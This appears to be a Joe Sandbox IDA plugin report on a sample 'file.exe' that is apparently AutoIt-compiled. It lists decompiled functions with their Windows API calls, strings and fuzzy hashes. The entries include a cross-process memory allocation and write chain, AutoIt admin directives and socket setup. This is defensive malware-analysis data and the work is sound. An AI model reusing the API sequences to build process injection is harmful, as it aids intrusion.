Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ad2c034f456cd7e14fd5ed8ed62c894248e0f415bcda66164e4c906820ad4ecc
Instruction ID: a37196033110254f1d29410589381cfdfe8f7f53a1cdca02a5630c3bf5d7e048
Opcode Fuzzy Hash: ad2c034f456cd7e14fd5ed8ed62c894248e0f415bcda66164e4c906820ad4ecc
Instruction Fuzzy Hash: FAF0FF32564219EB8622EF68F9C9C96B7DDBB65720BB41805F048DB541CB24FCF18AA4

Function 00245C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00245C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00245C6F
MessageBeep.USER32(00000000), ref: 00245C87
KillTimer.USER32(?,0000040A), ref: 00245CA3
EndDialog.USER32(?,00000001), ref: 00245CBD

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ec7b004a82f830b801a33c9892b5826bf10d5e4aa4ac78972aad13f4dc10422a
Instruction ID: 34faf9437d32699df0d57ae830d2c34f3bbb32aa08987eed8df55e7bf52daba6
Opcode Fuzzy Hash: ec7b004a82f830b801a33c9892b5826bf10d5e4aa4ac78972aad13f4dc10422a
Instruction Fuzzy Hash: 26018630510B14ABEB355F20EDCEFA677BCBB40B05F00055EB587A10E1DBF4A9948B91

Function 002122A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002122BE

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0

_free.LIBCMT ref: 002122D0
_free.LIBCMT ref: 002122E3
_free.LIBCMT ref: 002122F4
_free.LIBCMT ref: 00212305

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 58bc90f284c2919c72e29fe2d59ad56bef39f1c740576430b51dc93dcb6a31ea
Instruction ID: 7fde5623b8153792cee26a66782cbd7696cd25e81b4e0669b0529891526e091c
Opcode Fuzzy Hash: 58bc90f284c2919c72e29fe2d59ad56bef39f1c740576430b51dc93dcb6a31ea
Instruction Fuzzy Hash: 7DF05EB1920124CB8713AF58BC498AD3BE4F729760760170AF814DA3B1CF3448B5AFE4

Function 001F95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001F95D4
StrokeAndFillPath.GDI32(?,?,002371F7,00000000,?,?,?), ref: 001F95F0
SelectObject.GDI32(?,00000000), ref: 001F9603
DeleteObject.GDI32 ref: 001F9616
StrokePath.GDI32(?), ref: 001F9631

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1ccc431c8358e648659500fd782beb2ad6247d6b7f06d16659b9d60ecf9f98b9
Instruction ID: 55df4e31dd317141d8ef5abb98aaeaff4c2b482a35f7efe0d4635237fe9d81a8
Opcode Fuzzy Hash: 1ccc431c8358e648659500fd782beb2ad6247d6b7f06d16659b9d60ecf9f98b9
Instruction Fuzzy Hash: BDF03C30006A88EBDB266F65FD2C7B43B65AB00332F648318F529950F0C73089A5DF60

Function 00210F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 002110F9
__freea.LIBCMT ref: 00211117

Part of subcall function 00211537: _free.LIBCMT ref: 0021154F

Strings

am/pm, xrefs: 0021117A
a/p, xrefs: 002111DE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 9da6ac45968de7260d4faf376ea15ae288621218ff0e35ec8b2b7dce68d3dcb2
Instruction ID: f291e3cfc131d70b6e0794d2129651e452930ad01a02fb27236e1a843f13b689
Opcode Fuzzy Hash: 9da6ac45968de7260d4faf376ea15ae288621218ff0e35ec8b2b7dce68d3dcb2
Instruction Fuzzy Hash: 3FD1E0319302079ACB249F68C845BFAB7F1EF25300F280199EB159B658D3759DF0CB91

Function 002661D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00200242: EnterCriticalSection.KERNEL32(002B070C,002B1884,?,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020024D
Part of subcall function 00200242: LeaveCriticalSection.KERNEL32(002B070C,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020028A

Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9

__Init_thread_footer.LIBCMT ref: 00266238

Part of subcall function 002001F8: EnterCriticalSection.KERNEL32(002B070C,?,?,001F8747,002B2514), ref: 00200202
Part of subcall function 002001F8: LeaveCriticalSection.KERNEL32(002B070C,?,001F8747,002B2514), ref: 00200235

Part of subcall function 0025359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002535E4
Part of subcall function 0025359C: LoadStringW.USER32(002B2390,?,00000FFF,?), ref: 0025360A

Strings

x#+, xrefs: 0026636F
x#+, xrefs: 0026633A
x#+, xrefs: 00266353

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#+$x#+$x#+
API String ID: 1072379062-2040377914
Opcode ID: 612cfc21e960b35f60f38b5098a9b27af051c6570116f5d156efb9fa0154416c
Instruction ID: 56a6719798b0573b952b2cedc4984b480c957990e41c303874116b4bde95119b
Opcode Fuzzy Hash: 612cfc21e960b35f60f38b5098a9b27af051c6570116f5d156efb9fa0154416c
Instruction Fuzzy Hash: B1C1C371A1020AAFDB14DF58C895EBEB7B9FF58300F108059F9059B291DB70ED95CB90

Function 00218A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00218B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00218B7A
__dosmaperr.LIBCMT ref: 00218B81

Strings

. , xrefs: 00218A63

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .
API String ID: 2434981716-2462612998
Opcode ID: 3cbcdfa879547951ce53d8d4374cb532962f512a93257f78f940f686b97a5507
Instruction ID: 2bd50f894f6b6a6d1f1f7a1072f8e21067c6df64a47fbd2cbbb99bea6a95a0a9
Opcode Fuzzy Hash: 3cbcdfa879547951ce53d8d4374cb532962f512a93257f78f940f686b97a5507
Instruction Fuzzy Hash: 05418C70628145AFDB259F24DCC4AF97FE5DFA6308B2841A9F889C7542DE318DA38790

Function 00242716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0024B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002421D0,?,?,00000034,00000800,?,00000034), ref: 0024B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00242760

Part of subcall function 0024B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0024B3F8

Part of subcall function 0024B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0024B355
Part of subcall function 0024B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00242194,00000034,?,?,00001004,00000000,00000000), ref: 0024B365
Part of subcall function 0024B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00242194,00000034,?,?,00001004,00000000,00000000), ref: 0024B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002427CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0024281A

Strings

@, xrefs: 00242832

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 669de2ad35457127ea00cd36cec4719b3614bfe0877732db75bb50cefc687a66
Instruction ID: a1793bdbeae9acc93e6e6f597acd436d84c55ca0c4d8ef4e9155fd54f0cee09a
Opcode Fuzzy Hash: 669de2ad35457127ea00cd36cec4719b3614bfe0877732db75bb50cefc687a66
Instruction Fuzzy Hash: 72413D72900218AFDB15DFA4CD85ADEBBB8AF05300F104099FA55B7181DB70AE99CF60

Function 0021172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00211769
_free.LIBCMT ref: 00211834
_free.LIBCMT ref: 0021183E

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00211760, 00211767, 00211796, 002117CE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\file.exe
API String ID: 2506810119-517116171
Opcode ID: 7c041c8724fadefa0adf119aca7e49c01e118af0adac7b11fb933b3d86c974d5
Instruction ID: e233df059d5b0e1de7f4f826224bb1effa4705445295077304c42793c9b04c59
Opcode Fuzzy Hash: 7c041c8724fadefa0adf119aca7e49c01e118af0adac7b11fb933b3d86c974d5
Instruction Fuzzy Hash: F831CE71A20218EFDB21DF999885DDEBBFCEBA5310B604166F90497251D7B08EB1CB90

Function 0024C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0024C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0024C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002B1990,01055730), ref: 0024C395

Strings

0, xrefs: 0024C2DF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 2e290b599ff9ca37905c89a5a32839313f55bf2659184798be0c5804b9f5b2db
Instruction ID: ff403d45fb17a28e307ba05eda793edf31cc5e959c1a16404a49bb18cdaa6cae
Opcode Fuzzy Hash: 2e290b599ff9ca37905c89a5a32839313f55bf2659184798be0c5804b9f5b2db
Instruction Fuzzy Hash: 9041E3312163029FD728DF29D884B1ABBE4AF85310F2086ADF9A5972D1D770E854CB62

Function 00274416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0027CC08,00000000,?,?,?,?), ref: 002744AA
GetWindowLongW.USER32 ref: 002744C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002744D7

Strings

SysTreeView32, xrefs: 0027447C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b92fea825ed9cbb69a88383b715dfe86488a857e641d8b8ef599d8f34c5c53da
Instruction ID: ac4b2a6435104dffa5c387249a91039084f540e0a8450f1cba7c11f68277eea4
Opcode Fuzzy Hash: b92fea825ed9cbb69a88383b715dfe86488a857e641d8b8ef599d8f34c5c53da
Instruction Fuzzy Hash: 27317031220606AFDF21AE38DC45BEA77A9EB59334F608715F979921E0DB70EC609B50

Function 00246E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00246EED
VariantCopyInd.OLEAUT32(?,?), ref: 00246F08
VariantClear.OLEAUT32(?), ref: 00246F12

Strings

*j$, xrefs: 00246E8B, 00246E90, 00246EF8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j$
API String ID: 2173805711-1770683864
Opcode ID: 2fd803801ef7018bc17f418910512b7a333233f1092910a026d0b4ceb6620d18
Instruction ID: 1411e9a93834289013dad6b678399741436386989ce979a119fe115801f33131
Opcode Fuzzy Hash: 2fd803801ef7018bc17f418910512b7a333233f1092910a026d0b4ceb6620d18
Instruction Fuzzy Hash: 5B31F671628645DFCB08AF64F8989BE37B6FF46300B210498F9834B6A1C7709D25DBD2

Function 0026304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0026335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00263077,?,?), ref: 00263378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
_wcslen.LIBCMT ref: 0026309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00263106

Strings

255.255.255.255, xrefs: 00263095, 0026309A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 78b79df701035071317136e225f5bddb31de660d75cf6c14c6016d81a398cda3
Instruction ID: d7b871ee39c8182542ebbd75c2ea19f10a0b17ad53ad3b186faddda334f78c3a
Opcode Fuzzy Hash: 78b79df701035071317136e225f5bddb31de660d75cf6c14c6016d81a398cda3
Instruction Fuzzy Hash: 6B31D535614206DFCB20CF28C585EA977E0EF55318F248099E9158B392DB72DED5CB61

Function 00274653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00274705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00274713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0027471A

Strings

msctls_updown32, xrefs: 00274684

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c03578c89cd67064adcb9f6fd6831a9a7304fa3fba9c7d8c5dfc02709e0c70a1
Instruction ID: a0ca39027813f40035e9234681d5c011742e6e786727007c11fedb4bcd099f19
Opcode Fuzzy Hash: c03578c89cd67064adcb9f6fd6831a9a7304fa3fba9c7d8c5dfc02709e0c70a1
Instruction Fuzzy Hash: 0B21A1B5610209AFDB14EF64ECD5DBB37ADEF9A394B504149FA049B251CB30EC61CB60

Function 002495AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024961D

Strings

#OnAutoItStartRegister, xrefs: 002495F3
#requireadmin, xrefs: 002495D9
#notrayicon, xrefs: 002495B7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 896bc2094fcb9e49c7b2f74a55447332749577db5f5df7eafa5f54e0046aa904
Instruction ID: c04b5cb505f065d05f274196bf5a7c8a14b87a0e4f237f58939d14d52b3fe9ce
Opcode Fuzzy Hash: 896bc2094fcb9e49c7b2f74a55447332749577db5f5df7eafa5f54e0046aa904
Instruction Fuzzy Hash: 43218E3213461166D335BF24EC02FBB73DC9F65310F508025FA4997082EBA09DF1C291

Function 002737B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00273840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00273850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00273876

Strings

Listbox, xrefs: 0027380F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 8d7918a22de34d650365e7f87e534202d820c1181b7ce966652a407b5d17f785
Instruction ID: 77e0fe1346b97477dd458572ecf9b9dcb1d7d6dc5ff77a19ccb863e3a44a67e6
Opcode Fuzzy Hash: 8d7918a22de34d650365e7f87e534202d820c1181b7ce966652a407b5d17f785
Instruction Fuzzy Hash: 88219272620119BBEF15CF64DC85FBB776EEF89760F108114F9489B190CA71DC629BA0

Function 002549F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00254A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00254A5C
SetErrorMode.KERNEL32(00000000,?,?,0027CC08), ref: 00254AD0

Strings

%lu, xrefs: 00254A6F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: ec3555dcab3f7f5b62cee090d377db5bc5f7bb1530915b75c754f883d04b009f
Instruction ID: 57829eb656b232aba7f9af12fed21a55b3cb3717557d3f0354b8ec0a9b1a16cb
Opcode Fuzzy Hash: ec3555dcab3f7f5b62cee090d377db5bc5f7bb1530915b75c754f883d04b009f
Instruction Fuzzy Hash: 71318575A00109AFDB10DF64C985EAEB7F8EF09308F1480A9F909DB252D771EE85CB61

Function 002741EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0027424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00274264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00274271

Strings

msctls_trackbar32, xrefs: 00274226

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

